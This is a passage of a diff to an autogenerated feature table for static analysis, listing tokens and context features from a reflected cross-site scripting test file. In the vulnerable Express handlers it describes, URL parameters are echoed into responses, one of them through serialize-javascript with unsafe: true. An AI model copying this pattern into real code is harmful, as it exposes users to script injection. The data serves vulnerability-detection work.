autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:34 | serializeJavaScript | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:34 | serializeJavaScript | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | exceptional return of seriali ... true}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | exceptional return of seriali ... true}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | exceptional return of seriali ... true}) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | exceptional return of seriali ... true}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | exceptional return of seriali ... true}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | seriali ... true}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | seriali ... true}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | seriali ... true}) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | seriali ... true}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:16:49:53 | seriali ... true}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:49:36:49:36 | p | CalleeFlexibleAccessPath | serializeJavaScript | | autogenerated/Xss/ReflectedXss/tst2.js:49:36:49:36 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:49:36:49:36 | p | calleeImports | serialize-javascript | @@ -22060,6 +146900,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:49:39:49:52 | {unsafe: true} | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | | autogenerated/Xss/ReflectedXss/tst2.js:49:39:49:52 | {unsafe: true} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:49:39:49:52 | {unsafe: true} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:45 | unsafe | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:45 | unsafe | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:45 | unsafe | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:45 | unsafe | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:45 | unsafe | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:49:40:49:51 | unsafe: true | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:49:48:49:51 | true | CalleeFlexibleAccessPath | serializeJavaScript | | autogenerated/Xss/ReflectedXss/tst2.js:49:48:49:51 | true | InputAccessPathFromCallee | 1.unsafe | | autogenerated/Xss/ReflectedXss/tst2.js:49:48:49:51 | true | InputArgumentIndex | 1 | @@ -22070,6 +146925,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:49:48:49:51 | true | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | | autogenerated/Xss/ReflectedXss/tst2.js:49:48:49:51 | true | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:49:48:49:51 | true | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:5 | res | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:10 | res.send | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | exceptional return of res.send(unsafe) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | exceptional return of res.send(unsafe) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | exceptional return of res.send(unsafe) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | exceptional return of res.send(unsafe) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | exceptional return of res.send(unsafe) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | res.send(unsafe) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | res.send(unsafe) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | res.send(unsafe) | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | res.send(unsafe) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:51:3:51:18 | res.send(unsafe) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:51:7:51:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:51:7:51:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:51:7:51:10 | send | enclosingFunctionBody | req res p req params serialized serializeJavaScript p res send serialized unsafe serializeJavaScript p unsafe true res send unsafe | +| autogenerated/Xss/ReflectedXss/tst2.js:51:7:51:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:51:7:51:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:51:12:51:17 | unsafe | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:51:12:51:17 | unsafe | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:51:12:51:17 | unsafe | contextFunctionInterfaces | | @@ -22078,12 +146958,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:51:12:51:17 | unsafe | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:51:12:51:17 | unsafe | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:51:12:51:17 | unsafe | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:12 | fclone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:12 | fclone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:12 | fclone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:12 | fclone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:32 | fclone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:32 | fclone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:32 | fclone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:32 | fclone ... clone') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:32 | fclone ... clone') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:7:54:32 | fclone ... clone') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:22 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:22 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:22 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:32 | exceptional return of require('fclone') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:32 | exceptional return of require('fclone') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:32 | exceptional return of require('fclone') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:32 | require('fclone') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:32 | require('fclone') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:54:16:54:32 | require('fclone') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:54:24:54:31 | 'fclone' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst2.js:54:24:54:31 | 'fclone' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:54:24:54:31 | 'fclone' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst2.js:54:24:54:31 | 'fclone' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst2.js:54:24:54:31 | 'fclone' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:54:24:54:31 | 'fclone' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:56:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:56:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:56:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:56:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:56:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:56:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:65:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:65:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:65:2 | app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:65:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:65:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:1:65:2 | exceptional return of app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:5:56:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:5:56:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:5:56:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:56:9:56:14 | '/baz' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:56:9:56:14 | '/baz' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:56:9:56:14 | '/baz' | calleeImports | express | @@ -22091,6 +147005,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:56:9:56:14 | '/baz' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:56:9:56:14 | '/baz' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:56:9:56:14 | '/baz' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | fclone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | fclone | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | fclone | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | fclone | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | fclone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | this | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:56:16 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | functio ... OT OK\\n} | calleeImports | express | @@ -22098,6 +147032,157 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | functio ... OT OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:17:65:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:26:56:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:56:31:56:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:11 | { p } | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:11 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:11 | { p } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | { p } = req.params | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:7:57:24 | { p } = req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:9:57:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:17 | req | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:17 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:24 | req.params | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:15:57:24 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:57:19:57:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:57:19:57:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:57:19:57:24 | params | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:57:19:57:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:57:19:57:24 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:9 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:9 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:9 | obj | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:9 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:9 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj = {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj = {} | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj = {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:59:7:59:14 | obj = {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:59:13:59:14 | {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:59:13:59:14 | {} | 